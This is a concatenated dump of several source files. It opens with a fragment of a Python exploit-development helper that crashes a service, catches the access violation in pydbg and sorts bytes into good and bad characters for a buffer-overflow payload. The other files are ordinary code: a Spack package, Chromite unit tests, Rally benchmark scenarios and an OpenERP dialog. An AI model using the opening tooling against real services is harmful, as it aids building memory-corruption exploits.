# sent data must be equal to data in memory
if raw_data == (cur_char * 4):
good_chars.append(cur_char)
print("[+] char {} is good.".format(chars_to_str(cur_char)))
print("[+] good chars so far: {}.".format(chars_to_str(good_chars)))
with open("good_chars.txt", 'w') as f:
f.write(chars_to_str(good_chars))
else:
bad_chars.append(cur_char)
print("[+] char {} is bad.".format(chars_to_str(cur_char)))
print("[+] bad chars so far: {}.".format(chars_to_str(bad_chars)))
with open("bad_chars.txt", 'w') as f:
f.write(chars_to_str(bad_chars))
return
def _access_violation_handler(dbg):
# on access violation read data from a pointer on the stack to determine if the sent buffer was mangled in any way
print("[+] Access violation caught.")
# [ESP + 0x4C] points to our test buffer
esp_offset = 0x4C
buf_address = dbg.read(dbg.context.Esp + esp_offset, 0x4)
buf_address = dbg.flip_endian_dword(buf_address)
print("[+] [DEBUG] buf_address: {}".format(buf_address))
if buf_address:
# read 4 bytes test buffer
buffer = dbg.read(buf_address, 0x4)
print("[+] buffer is " + buffer)
else:
# now when the first request sent is the one for checking if the
# service responds, the buf_address sometimes returns 0. This is to
# handle that case.
buffer = ""
print("[+] checking whether the char is good or bad...")
check_char(buffer)
dbg.detach()
# noinspection PyUnresolvedReferences
return DBG_EXCEPTION_NOT_HANDLED
def debug_process(pid):
# create a debugger instance and attach to ovas PID"""
# noinspection PyUnresolvedReferences
dbg = pydbg()
# noinspection PyUnresolvedReferences
dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, _access_violation_handler)
while True:
try:
print("[+] attaching debugger to pid: {}.".format(pid))
if dbg.attach(pid):
return dbg
else:
return False
except Exception as e:
print("[+] error while attaching: {}.".format(e.message))
return False
if __name__ == '__main__':
# create and start crasher thread
crasher_thread = threading.Thread(target=crash_service)
crasher_thread.setDaemon(0)
crasher_thread.start()
print("[+] thread started")
# main loop
while True:
pid = restart_service()
print("[+] restart_service " + str(pid))
dbg = debug_process(pid)
print("[+] dbg started")
if dbg:
# tell crasher thread to send malicious input to process
evil_str_sent = False
# enter the debugging loop
dbg.run()
|
mit
|
iulian787/spack
|
var/spack/repos/builtin/packages/bedtools2/package.py
|
1
|
1337
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Bedtools2(Package):
"""Collectively, the bedtools utilities are a swiss-army knife of
tools for a wide-range of genomics analysis tasks. The most
widely-used tools enable genome arithmetic: that is, set theory
on the genome."""
homepage = "https://github.com/arq5x/bedtools2"
url = "https://github.com/arq5x/bedtools2/archive/v2.26.0.tar.gz"
version('2.29.2', sha256='bc2f36b5d4fc9890c69f607d54da873032628462e88c545dd633d2c787a544a5')
version('2.27.1', sha256='edcac089d84e63a51f85c3c189469daa7d42180272130b046856faad3cf79112')
version('2.27.0', sha256='e91390b567e577d337c15ca301e264b0355441f5ab90fa4f971622e3043e0ca0')
version('2.26.0', sha256='15db784f60a11b104ccbc9f440282e5780e0522b8d55d359a8318a6b61897977')
version('2.25.0', sha256='159122afb9978015f7ec85d7b17739b01415a5738086b20a48147eeefcf08cfb')
version('2.23.0', sha256='9dacaa561d11ce9835d1d51e5aeb092bcbe117b7119663ec9a671abac6a36056')
depends_on('zlib')
depends_on('python', type='build')
def install(self, spec, prefix):
make("prefix=%s" % prefix, "install")
|
lgpl-2.1
|
windyuuy/opera
|
chromium/src/third_party/chromite/buildbot/portage_utilities_unittest.py
|
2
|
25507
|
#!/usr/bin/python
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for portage_utilities.py."""
import fileinput
import mox
import os
import sys
import constants
if __name__ == '__main__':
sys.path.insert(0, constants.SOURCE_ROOT)
from chromite.lib import cros_build_lib
from chromite.lib import cros_test_lib
from chromite.lib import git
from chromite.lib import osutils
from chromite.buildbot import portage_utilities
# pylint: disable=W0212
MANIFEST = git.ManifestCheckout.Cached(constants.SOURCE_ROOT)
class _Package(object):
def __init__(self, package):
self.package = package
class _DummyCommandResult(object):
"""Create mock RunCommand results."""
def __init__(self, output):
# Members other than 'output' are expected to be unused, so
# we omit them here.
#
# All shell output will be newline terminated; we add the
# newline here for convenience.
self.output = output + '\n'
class EBuildTest(cros_test_lib.MoxTestCase):
def _makeFakeEbuild(self, fake_ebuild_path, fake_ebuild_content=''):
self.mox.StubOutWithMock(fileinput, 'input')
fileinput.input(fake_ebuild_path).AndReturn(fake_ebuild_content)
self.mox.ReplayAll()
fake_ebuild = portage_utilities.EBuild(fake_ebuild_path)
self.mox.VerifyAll()
return fake_ebuild
def testParseEBuildPath(self):
# Test with ebuild with revision number.
fake_ebuild_path = '/path/to/test_package/test_package-0.0.1-r1.ebuild'
fake_ebuild = self._makeFakeEbuild(fake_ebuild_path)
self.assertEquals(fake_ebuild._category, 'to')
self.assertEquals(fake_ebuild._pkgname, 'test_package')
self.assertEquals(fake_ebuild.version_no_rev, '0.0.1')
self.assertEquals(fake_ebuild.current_revision, 1)
self.assertEquals(fake_ebuild.version, '0.0.1-r1')
self.assertEquals(fake_ebuild.package, 'to/test_package')
self.assertEquals(fake_ebuild._ebuild_path_no_version,
'/path/to/test_package/test_package')
self.assertEquals(fake_ebuild.ebuild_path_no_revision,
'/path/to/test_package/test_package-0.0.1')
self.assertEquals(fake_ebuild._unstable_ebuild_path,
'/path/to/test_package/test_package-9999.ebuild')
self.assertEquals(fake_ebuild.ebuild_path, fake_ebuild_path)
def testParseEBuildPathNoRevisionNumber(self):
# Test with ebuild without revision number.
fake_ebuild_path = '/path/to/test_package/test_package-9999.ebuild'
fake_ebuild = self._makeFakeEbuild(fake_ebuild_path)
self.assertEquals(fake_ebuild._category, 'to')
self.assertEquals(fake_ebuild._pkgname, 'test_package')
self.assertEquals(fake_ebuild.version_no_rev, '9999')
self.assertEquals(fake_ebuild.current_revision, 0)
self.assertEquals(fake_ebuild.version, '9999')
self.assertEquals(fake_ebuild.package, 'to/test_package')
self.assertEquals(fake_ebuild._ebuild_path_no_version,
'/path/to/test_package/test_package')
self.assertEquals(fake_ebuild.ebuild_path_no_revision,
'/path/to/test_package/test_package-9999')
self.assertEquals(fake_ebuild._unstable_ebuild_path,
'/path/to/test_package/test_package-9999.ebuild')
self.assertEquals(fake_ebuild.ebuild_path, fake_ebuild_path)
def testGetCommitId(self):
fake_sources = '/path/to/sources'
fake_hash = '24ab3c9f6d6b5c744382dba2ca8fb444b9808e9f'
fake_ebuild_path = '/path/to/test_package/test_package-9999.ebuild'
fake_ebuild = self._makeFakeEbuild(fake_ebuild_path)
# git rev-parse HEAD
self.mox.StubOutWithMock(cros_build_lib, 'RunCommandCaptureOutput')
result = _DummyCommandResult(fake_hash)
cros_build_lib.RunCommandCaptureOutput(
mox.IgnoreArg(),
cwd=mox.IgnoreArg(),
print_cmd=portage_utilities.EBuild.VERBOSE).AndReturn(result)
self.mox.ReplayAll()
test_hash = fake_ebuild.GetCommitId(fake_sources)
self.mox.VerifyAll()
self.assertEquals(test_hash, fake_hash)
def testEBuildStable(self):
"""Test ebuild w/keyword variations"""
fake_ebuild_path = '/path/to/test_package/test_package-9999.ebuild'
datasets = (
('~amd64', False),
('amd64', True),
('~amd64 ~arm ~x86', False),
('~amd64 arm ~x86', True),
('-* ~arm', False),
('-* x86', True),
)
for keywords, stable in datasets:
fake_ebuild = self._makeFakeEbuild(
fake_ebuild_path, fake_ebuild_content=['KEYWORDS="%s"\n' % keywords])
self.assertEquals(fake_ebuild.is_stable, stable)
self.mox.UnsetStubs()
def testEBuildBlacklisted(self):
"""Test blacklisted ebuild"""
fake_ebuild_path = '/path/to/test_package/test_package-9999.ebuild'
fake_ebuild = self._makeFakeEbuild(fake_ebuild_path)
self.assertEquals(fake_ebuild.is_blacklisted, False)
self.mox.UnsetStubs()
fake_ebuild = self._makeFakeEbuild(
fake_ebuild_path, fake_ebuild_content=['CROS_WORKON_BLACKLIST="1"\n'])
self.assertEquals(fake_ebuild.is_blacklisted, True)
class ProjectAndPathTest(cros_test_lib.MoxTempDirTestCase):
def _MockParseWorkonVariables(self, fake_projects, _fake_localname,
_fake_subdir, fake_ebuild_contents):
"""Mock the necessary calls, start Replay mode, call GetSourcePath()."""
# pylint: disable=E1120
self.mox.StubOutWithMock(os.path, 'isdir')
self.mox.StubOutWithMock(portage_utilities.EBuild, 'GetGitProjectName')
# We need 'chromeos-base' here because it controls default _SUBDIR values.
ebuild_path = os.path.join(self.tempdir, 'chromeos-base', 'package',
'package-9999.ebuild')
osutils.WriteFile(ebuild_path, fake_ebuild_contents, makedirs=True)
for p in fake_projects:
os.path.isdir(mox.IgnoreArg()).AndReturn(True)
portage_utilities.EBuild.GetGitProjectName(
MANIFEST, mox.IgnoreArg()).AndReturn(p)
self.mox.ReplayAll()
ebuild = portage_utilities.EBuild(ebuild_path)
result = ebuild.GetSourcePath(self.tempdir, MANIFEST)
self.mox.VerifyAll()
return result
def testParseLegacyWorkonVariables(self):
"""Tests if ebuilds in a single item format are correctly parsed."""
fake_project = 'my_project1'
fake_localname = 'foo'
fake_subdir = 'bar'
fake_ebuild_contents = """
CROS_WORKON_PROJECT=%s
CROS_WORKON_LOCALNAME=%s
CROS_WORKON_SUBDIR=%s
""" % (fake_project, fake_localname, fake_subdir)
project, subdir = self._MockParseWorkonVariables(
[fake_project], [fake_localname], [fake_subdir], fake_ebuild_contents)
self.assertEquals(project, [fake_project])
self.assertEquals(subdir, [os.path.join(
self.tempdir, 'platform', '%s/%s' % (fake_localname, fake_subdir))])
def testParseArrayWorkonVariables(self):
"""Tests if ebuilds in an array format are correctly parsed."""
fake_projects = ['my_project1', 'my_project2', 'my_project3']
fake_localname = ['foo', 'bar', 'bas']
fake_subdir = ['sub1', 'sub2', 'sub3']
# The test content is formatted using the same function that
# formats ebuild output, ensuring that we can parse our own
# products.
fake_ebuild_contents = """
CROS_WORKON_PROJECT=%s
CROS_WORKON_LOCALNAME=%s
CROS_WORKON_SUBDIR=%s
""" % (portage_utilities.EBuild.FormatBashArray(fake_projects),
portage_utilities.EBuild.FormatBashArray(fake_localname),
portage_utilities.EBuild.FormatBashArray(fake_subdir))
project, subdir = self._MockParseWorkonVariables(
fake_projects, fake_localname, fake_subdir, fake_ebuild_contents)
self.assertEquals(project, fake_projects)
fake_path = ['%s/%s' % (fake_localname[i], fake_subdir[i])
for i in range(0, len(fake_projects))]
fake_path = map(lambda x: os.path.realpath(
os.path.join(self.tempdir, 'platform', x)), fake_path)
self.assertEquals(subdir, fake_path)
class StubEBuild(portage_utilities.EBuild):
def __init__(self, path):
super(StubEBuild, self).__init__(path)
self.is_workon = True
self.is_stable = True
def _ReadEBuild(self, path):
pass
def GetCommitId(self, srcpath):
id_map = {
'p1_path' : 'my_id',
'p1_path1' : 'my_id1',
'p1_path2' : 'my_id2'
}
if srcpath in id_map:
return id_map[srcpath]
else:
return 'you_lose'
class EBuildRevWorkonTest(cros_test_lib.MoxTempDirTestCase):
# Lines that we will feed as fake ebuild contents to
# EBuild.MarAsStable(). This is the minimum content needed
# to test the various branches in the function's main processing
# loop.
_mock_ebuild = ['EAPI=2\n',
'CROS_WORKON_COMMIT=old_id\n',
'KEYWORDS=\"~x86 ~arm ~amd64\"\n',
'src_unpack(){}\n']
_mock_ebuild_multi = ['EAPI=2\n',
'CROS_WORKON_COMMIT=("old_id1","old_id2")\n',
'KEYWORDS=\"~x86 ~arm ~amd64\"\n',
'src_unpack(){}\n']
def setUp(self):
self.overlay = '/sources/overlay'
package_name = os.path.join(self.overlay,
'category/test_package/test_package-0.0.1')
ebuild_path = package_name + '-r1.ebuild'
self.m_ebuild = StubEBuild(ebuild_path)
self.revved_ebuild_path = package_name + '-r2.ebuild'
def createRevWorkOnMocks(self, ebuild_content, rev, multi=False):
# pylint: disable=E1120
self.mox.StubOutWithMock(os.path, 'exists')
self.mox.StubOutWithMock(cros_build_lib, 'Die')
self.mox.StubOutWithMock(portage_utilities.shutil, 'copyfile')
self.mox.StubOutWithMock(os, 'unlink')
self.mox.StubOutWithMock(portage_utilities.EBuild, '_RunCommand')
self.mox.StubOutWithMock(cros_build_lib, 'RunCommand')
self.mox.StubOutWithMock(portage_utilities.filecmp, 'cmp')
self.mox.StubOutWithMock(portage_utilities.fileinput, 'input')
self.mox.StubOutWithMock(portage_utilities.EBuild, 'GetVersion')
self.mox.StubOutWithMock(portage_utilities.EBuild, 'GetSourcePath')
self.mox.StubOutWithMock(portage_utilities.EBuild, 'GetTreeId')
if multi:
portage_utilities.EBuild.GetSourcePath('/sources', MANIFEST).AndReturn(
(['fake_project1','fake_project2'], ['p1_path1','p1_path2']))
else:
portage_utilities.EBuild.GetSourcePath('/sources', MANIFEST).AndReturn(
(['fake_project1'], ['p1_path']))
portage_utilities.EBuild.GetVersion('/sources', MANIFEST,
'0.0.1').AndReturn('0.0.1')
if multi:
portage_utilities.EBuild.GetTreeId('p1_path1').AndReturn('treehash1')
portage_utilities.EBuild.GetTreeId('p1_path2').AndReturn('treehash2')
else:
portage_utilities.EBuild.GetTreeId('p1_path').AndReturn('treehash')
ebuild_9999 = self.m_ebuild._unstable_ebuild_path
os.path.exists(ebuild_9999).AndReturn(True)
# These calls come from MarkAsStable()
portage_utilities.shutil.copyfile(ebuild_9999, self.revved_ebuild_path)
m_file = self.mox.CreateMock(file)
portage_utilities.fileinput.input(self.revved_ebuild_path,
inplace=1).AndReturn(ebuild_content)
m_file.write('EAPI=2\n')
if multi:
m_file.write('CROS_WORKON_COMMIT=("my_id1" "my_id2")\n')
m_file.write('CROS_WORKON_TREE=("treehash1" "treehash2")\n')
else:
m_file.write('CROS_WORKON_COMMIT="my_id"\n')
m_file.write('CROS_WORKON_TREE="treehash"\n')
m_file.write('KEYWORDS=\"x86 arm amd64\"\n')
m_file.write('src_unpack(){}\n')
# MarkAsStable() returns here
portage_utilities.filecmp.cmp(self.m_ebuild.ebuild_path,
self.revved_ebuild_path,
shallow=False).AndReturn(not rev)
if rev:
portage_utilities.EBuild._RunCommand(
['git', 'add', self.revved_ebuild_path],
cwd=self.overlay)
if self.m_ebuild.is_stable:
portage_utilities.EBuild._RunCommand(
['git', 'rm', self.m_ebuild.ebuild_path],
cwd=self.overlay)
else:
os.unlink(self.revved_ebuild_path)
return m_file
def testRevWorkOnEBuild(self):
"""Test Uprev of a single project ebuild."""
m_file = self.createRevWorkOnMocks(self._mock_ebuild, rev=True)
self.mox.ReplayAll()
result = self.m_ebuild.RevWorkOnEBuild('/sources', MANIFEST,
redirect_file=m_file)
self.mox.VerifyAll()
self.assertEqual(result, 'category/test_package-0.0.1-r2')
def testRevWorkOnMultiEBuild(self):
"""Test Uprev of a multi-project (array) ebuild."""
m_file = self.createRevWorkOnMocks(self._mock_ebuild_multi, rev=True,
multi=True)
self.mox.ReplayAll()
result = self.m_ebuild.RevWorkOnEBuild('/sources', MANIFEST,
redirect_file=m_file)
self.mox.VerifyAll()
self.assertEqual(result, 'category/test_package-0.0.1-r2')
def testRevUnchangedEBuild(self):
m_file = self.createRevWorkOnMocks(self._mock_ebuild, rev=False)
self.mox.ReplayAll()
result = self.m_ebuild.RevWorkOnEBuild('/sources', MANIFEST,
redirect_file=m_file)
self.mox.VerifyAll()
self.assertEqual(result, None)
def testRevMissingEBuild(self):
self.revved_ebuild_path = self.m_ebuild.ebuild_path
self.m_ebuild.ebuild_path = self.m_ebuild._unstable_ebuild_path
self.m_ebuild.current_revision = 0
self.m_ebuild.is_stable = False
m_file = self.createRevWorkOnMocks(
self._mock_ebuild[0:1] + self._mock_ebuild[2:], rev=True)
self.mox.ReplayAll()
result = self.m_ebuild.RevWorkOnEBuild('/sources', MANIFEST,
redirect_file=m_file)
self.mox.VerifyAll()
self.assertEqual(result, 'category/test_package-0.0.1-r1')
def testCommitChange(self):
self.mox.StubOutWithMock(cros_build_lib, 'RunCommand')
mock_message = 'Commitme'
cros_build_lib.RunCommand(
['git', 'commit', '-a', '-m', mock_message], cwd='.', print_cmd=False)
self.mox.ReplayAll()
self.m_ebuild.CommitChange(mock_message, '.')
self.mox.VerifyAll()
def testUpdateCommitHashesForChanges(self):
"""Tests that we can update the commit hashes for changes correctly."""
cls = portage_utilities.EBuild
ebuild1 = self.mox.CreateMock(cls)
ebuild1.ebuild_path = 'public_overlay/ebuild.ebuild'
ebuild1.package = 'test/project'
self.mox.StubOutWithMock(portage_utilities, 'FindOverlays')
self.mox.StubOutWithMock(cls, '_GetEBuildProjects')
self.mox.StubOutWithMock(cls, '_GetSHA1ForProject')
self.mox.StubOutWithMock(cls, 'UpdateEBuild')
self.mox.StubOutWithMock(cls, 'CommitChange')
self.mox.StubOutWithMock(cls, 'GitRepoHasChanges')
build_root = 'fakebuildroot'
overlays = ['public_overlay']
changes = ['fake change']
projects = ['fake_project1', 'fake_project2']
project_ebuilds = {ebuild1: projects}
portage_utilities.FindOverlays(
constants.BOTH_OVERLAYS, buildroot=build_root).AndReturn(overlays)
cls._GetEBuildProjects(build_root, mox.IgnoreArg(), overlays,
changes).AndReturn(project_ebuilds)
for i, p in enumerate(projects):
cls._GetSHA1ForProject(mox.IgnoreArg(), p).InAnyOrder().AndReturn(str(i))
cls.UpdateEBuild(ebuild1.ebuild_path, dict(CROS_WORKON_COMMIT='("0" "1")'))
cls.GitRepoHasChanges('public_overlay').AndReturn(True)
cls.CommitChange(mox.IgnoreArg(), overlay='public_overlay')
self.mox.ReplayAll()
cls.UpdateCommitHashesForChanges(changes, build_root, MANIFEST)
self.mox.VerifyAll()
def testGitRepoHasChanges(self):
"""Tests that GitRepoHasChanges works correctly."""
cros_build_lib.RunCommand(
['git', 'clone', '--depth=1',
'file://' + os.path.join(constants.SOURCE_ROOT, 'chromite'),
self.tempdir])
# No changes yet as we just cloned the repo.
self.assertFalse(portage_utilities.EBuild.GitRepoHasChanges(self.tempdir))
# Update metadata but no real changes.
osutils.Touch(os.path.join(self.tempdir, 'LICENSE'))
self.assertFalse(portage_utilities.EBuild.GitRepoHasChanges(self.tempdir))
# A real change.
osutils.WriteFile(os.path.join(self.tempdir, 'LICENSE'), 'hi')
self.assertTrue(portage_utilities.EBuild.GitRepoHasChanges(self.tempdir))
class FindOverlaysTest(cros_test_lib.MoxTestCase):
FAKE, MARIO = 'fake-board', 'x86-mario'
PRIVATE = constants.PRIVATE_OVERLAYS
PUBLIC = constants.PUBLIC_OVERLAYS
BOTH = constants.BOTH_OVERLAYS
def setUp(self):
"""Fetch all overlays."""
self.overlays = {}
for b in (None, self.FAKE, self.MARIO):
self.overlays[b] = d = {}
for o in (self.PRIVATE, self.PUBLIC, self.BOTH, None):
d[o] = portage_utilities.FindOverlays(o, b, constants.SOURCE_ROOT)
self.no_overlays = not bool(any(d.values()))
def testMissingPrimaryOverlay(self):
"""Test what happens when a primary overlay is missing.
If the overlay doesn't exist, FindOverlays should throw a
MissingOverlayException.
"""
self.assertRaises(portage_utilities.MissingOverlayException,
portage_utilities.FindPrimaryOverlay, self.BOTH,
self.FAKE, constants.SOURCE_ROOT)
def testDuplicates(self):
"""Verify that no duplicate overlays are returned."""
for d in self.overlays.itervalues():
for overlays in d.itervalues():
self.assertEqual(len(overlays), len(set(overlays)))
def testOverlaysExist(self):
"""Verify that all overlays returned actually exist on disk."""
for d in self.overlays.itervalues():
for overlays in d.itervalues():
self.assertTrue(all(os.path.isdir(x) for x in overlays))
def testPrivatePublicOverlayTypes(self):
"""Verify public/private filtering.
If we ask for results from 'both overlays', we should
find all public and all private overlays.
There should always be at least one public overlay. (Note:
there may not be any private overlays, e.g. if the user has
a public checkout.)
"""
if self.no_overlays:
return
for d in self.overlays.itervalues():
self.assertTrue(set(d[self.BOTH]) >= set(d[self.PUBLIC]))
self.assertTrue(set(d[self.BOTH]) > set(d[self.PRIVATE]))
self.assertTrue(set(d[self.PUBLIC]).isdisjoint(d[self.PRIVATE]))
def testNoOverlayType(self):
"""If we specify overlay_type=None, no results should be returned."""
self.assertTrue(all(d[None] == [] for d in self.overlays.itervalues()))
def testNonExistentBoard(self):
"""Test what happens when a non-existent board is supplied.
If we specify a non-existent board to FindOverlays, only generic
overlays should be returned.
"""
if self.no_overlays:
return
for o in (self.PUBLIC, self.BOTH):
self.assertTrue(set(self.overlays[self.FAKE][o]) <
set(self.overlays[self.MARIO][o]))
def testAllBoards(self):
"""If we specify board=None, all overlays should be returned."""
if self.no_overlays:
return
for o in (self.PUBLIC, self.BOTH):
for b in (self.FAKE, self.MARIO):
self.assertTrue(set(self.overlays[b][o]) < set(self.overlays[None][o]))
def testMarioPrimaryOverlay(self):
"""Verify that mario has a primary overlay.
Further, the only difference between the public overlays for mario and a
fake board is the primary overlay, which is listed last.
"""
if self.no_overlays:
return
mario_primary = portage_utilities.FindPrimaryOverlay(self.BOTH, self.MARIO,
constants.SOURCE_ROOT)
self.assertTrue(mario_primary in self.overlays[self.MARIO][self.BOTH])
self.assertTrue(mario_primary not in self.overlays[self.FAKE][self.BOTH])
self.assertEqual(mario_primary, self.overlays[self.MARIO][self.PUBLIC][-1])
self.assertEqual(self.overlays[self.MARIO][self.PUBLIC][:-1],
self.overlays[self.FAKE][self.PUBLIC])
class BuildEBuildDictionaryTest(cros_test_lib.MoxTestCase):
def setUp(self):
self.mox.StubOutWithMock(os, 'walk')
self.mox.StubOutWithMock(cros_build_lib, 'RunCommand')
self.package = 'chromeos-base/test_package'
self.root = '/overlay/chromeos-base/test_package'
self.package_path = self.root + '/test_package-0.0.1.ebuild'
paths = [[self.root, [], []]]
os.walk("/overlay").AndReturn(paths)
self.mox.StubOutWithMock(portage_utilities, '_FindUprevCandidates')
def testWantedPackage(self):
overlays = {"/overlay": []}
package = _Package(self.package)
portage_utilities._FindUprevCandidates([]).AndReturn(package)
self.mox.ReplayAll()
portage_utilities.BuildEBuildDictionary(overlays, False, [self.package])
self.mox.VerifyAll()
self.assertEquals(len(overlays), 1)
self.assertEquals(overlays["/overlay"], [package])
def testUnwantedPackage(self):
overlays = {"/overlay": []}
package = _Package(self.package)
portage_utilities._FindUprevCandidates([]).AndReturn(package)
self.mox.ReplayAll()
portage_utilities.BuildEBuildDictionary(overlays, False, [])
self.assertEquals(len(overlays), 1)
self.assertEquals(overlays["/overlay"], [])
self.mox.VerifyAll()
class ProjectMappingTest(cros_test_lib.TestCase):
def testSplitEbuildPath(self):
"""Test if we can split an ebuild path into its components."""
ebuild_path = 'chromeos-base/power_manager/power_manager-9999.ebuild'
components = ['chromeos-base', 'power_manager', 'power_manager-9999']
for path in (ebuild_path, './' + ebuild_path, 'foo.bar/' + ebuild_path):
self.assertEquals(components, portage_utilities.SplitEbuildPath(path))
def testSplitPV(self):
"""Test splitting PVs into package and version components."""
pv = 'bar-1.2.3_rc1-r5'
package, version_no_rev, rev = tuple(pv.split('-'))
split_pv = portage_utilities.SplitPV(pv)
self.assertEquals(split_pv.pv, pv)
self.assertEquals(split_pv.package, package)
self.assertEquals(split_pv.version_no_rev, version_no_rev)
self.assertEquals(split_pv.rev, rev)
self.assertEquals(split_pv.version, '%s-%s' % (version_no_rev, rev))
def testSplitCPV(self):
"""Test splitting CPV into components."""
cpv = 'foo/bar-4.5.6_alpha-r6'
cat, pv = cpv.split('/', 1)
split_pv = portage_utilities.SplitPV(pv)
split_cpv = portage_utilities.SplitCPV(cpv)
self.assertEquals(split_cpv.category, cat)
for k, v in split_pv._asdict().iteritems():
self.assertEquals(getattr(split_cpv, k), v)
def testFindWorkonProjects(self):
"""Test if we can find the list of workon projects."""
power_manager = 'chromeos-base/power_manager'
power_manager_project = 'chromiumos/platform/power_manager'
kernel = 'sys-kernel/chromeos-kernel'
kernel_project = 'chromiumos/third_party/kernel'
matches = [
([power_manager], set([power_manager_project])),
([kernel], set([kernel_project])),
([power_manager, kernel], set([power_manager_project, kernel_project]))
]
if portage_utilities.FindOverlays(constants.BOTH_OVERLAYS):
for packages, projects in matches:
self.assertEquals(projects,
portage_utilities.FindWorkonProjects(packages))
class PackageDBTest(cros_test_lib.MoxTempDirTestCase):
fake_pkgdb = { 'category1' : [ 'package-1', 'package-2' ],
'category2' : [ 'package-3', 'package-4' ],
'category3' : [ 'invalid', 'semi-invalid' ],
'invalid' : [], }
fake_packages = []
build_root = None
fake_chroot = None
def setUp(self):
self.build_root = self.tempdir
# Prepare a fake chroot.
self.fake_chroot = os.path.join(self.build_root, 'chroot/build/amd64-host')
fake_pkgdb_path = os.path.join(self.fake_chroot, 'var/db/pkg')
os.makedirs(fake_pkgdb_path)
for cat, pkgs in self.fake_pkgdb.iteritems():
catpath = os.path.join(fake_pkgdb_path, cat)
if cat == 'invalid':
# Invalid category is a file. Should not be delved into.
osutils.Touch(catpath)
continue
os.makedirs(catpath)
for pkg in pkgs:
pkgpath = os.path.join(catpath, pkg)
if pkg == 'invalid':
# Invalid package is a file instead of a directory/
osutils.Touch(pkgpath)
continue
os.makedirs(pkgpath)
if pkg.endswith('-invalid'):
# Invalid package does not meet existence of "%s/%s.ebuild" file.
osutils.Touch(os.path.join(pkgpath, 'whatever'))
continue
# Correct pkg.
osutils.Touch(os.path.join(pkgpath, pkg + '.ebuild'))
pv = portage_utilities.SplitPV(pkg)
key = '%s/%s' % (cat, pv.package)
self.fake_packages.append((key, pv.version))
def testListInstalledPackages(self):
"""Test if listing packages installed into a root works."""
packages = portage_utilities.ListInstalledPackages(self.fake_chroot)
# Sort the lists, because the filesystem might reorder the entries for us.
packages.sort()
self.fake_packages.sort()
self.assertEquals(self.fake_packages, packages)
if __name__ == '__main__':
cros_test_lib.main()
|
bsd-3-clause
|
varuntiwari27/rally
|
rally/plugins/openstack/scenarios/fuel/environments.py
|
5
|
3334
|
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from rally.plugins.openstack import scenario
from rally.plugins.openstack.scenarios.fuel import utils
from rally.task import validation
class FuelEnvironments(utils.FuelScenario):
"""Benchmark scenarios for Fuel environments.
Scenarios take Fuel related parameters:
release_id: OpenStack release available in Fuel
deployment_mode: accepts 'ha_compact' or 'multinode'
network_provider: accepts 'nova' or 'neutron'
net_segment_type: accepts 'gre' or 'vlan'
"""
@validation.required_clients("fuel", admin=True)
@validation.required_openstack(admin=True)
@scenario.configure(context={"admin_cleanup": ["fuel"]})
def create_and_delete_environment(self, release_id=1,
network_provider="neutron",
deployment_mode="ha_compact",
net_segment_type="vlan",
delete_retries=5):
"""Create and delete Fuel environments.
:param release_id: release id (default 1)
:param network_provider: network provider (default 'neutron')
:param deployment_mode: deployment mode (default 'ha_compact')
:param net_segment_type: net segment type (default 'vlan')
:param delete_retries: retries count on delete operations (default 5)
"""
env_id = self._create_environment(release_id=release_id,
network_provider=network_provider,
deployment_mode=deployment_mode,
net_segment_type=net_segment_type)
self._delete_environment(env_id, delete_retries)
@validation.required_clients("fuel", admin=True)
@validation.required_openstack(admin=True)
@scenario.configure(context={"admin_cleanup": ["fuel"]})
def create_and_list_environments(self, release_id=1,
network_provider="neutron",
deployment_mode="ha_compact",
net_segment_type="vlan"):
"""Create and list Fuel environments
:param release_id: release id (default 1)
:param network_provider: network provider (default 'neutron')
:param deployment_mode: deployment mode (default 'ha_compact')
:param net_segment_type: net segment type (default 'vlan')
"""
self._create_environment(release_id=release_id,
network_provider=network_provider,
deployment_mode=deployment_mode,
net_segment_type=net_segment_type)
self._list_environments()
|
apache-2.0
|
hanicker/odoo
|
addons/base_report_designer/plugin/openerp_report_designer/bin/script/Expression.py
|
384
|
4146
|
#########################################################################
#
# Copyright (c) 2003-2004 Danny Brewer [email protected]
# Copyright (C) 2004-2010 OpenERP SA (<http://openerp.com>).
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# See: http://www.gnu.org/licenses/lgpl.html
#
#############################################################################
import uno
import string
import unohelper
import xmlrpclib
from com.sun.star.task import XJobExecutor
if __name__<>"package":
from lib.gui import *
from lib.error import ErrorDialog
from lib.functions import *
database="test"
uid = 3
class Expression(unohelper.Base, XJobExecutor ):
def __init__(self, sExpression="", sName="", bFromModify=False):
LoginTest()
if not loginstatus and __name__=="package":
exit(1)
self.win = DBModalDialog(60, 50, 180, 65, "Expression Builder")
self.win.addFixedText("lblExpression",17 , 10, 35, 15, "Expression :")
self.win.addEdit("txtExpression", -5, 5, 123, 15)
self.win.addFixedText("lblName", 2, 30, 50, 15, "Displayed Name :")
self.win.addEdit("txtName", -5, 25, 123, 15)
self.win.addButton( "btnOK", -5, -5, 40, 15, "OK", actionListenerProc = self.btnOk_clicked )
self.win.addButton( "btnCancel", -5 - 40 -5, -5, 40, 15, "Cancel", actionListenerProc = self.btnCancel_clicked )
self.bModify=bFromModify
if self.bModify==True:
self.win.setEditText("txtExpression",sExpression)
self.win.setEditText("txtName",sName)
self.win.doModalDialog("",None)
def btnOk_clicked(self, oActionEvent):
desktop=getDesktop()
doc = desktop.getCurrentComponent()
text = doc.Text
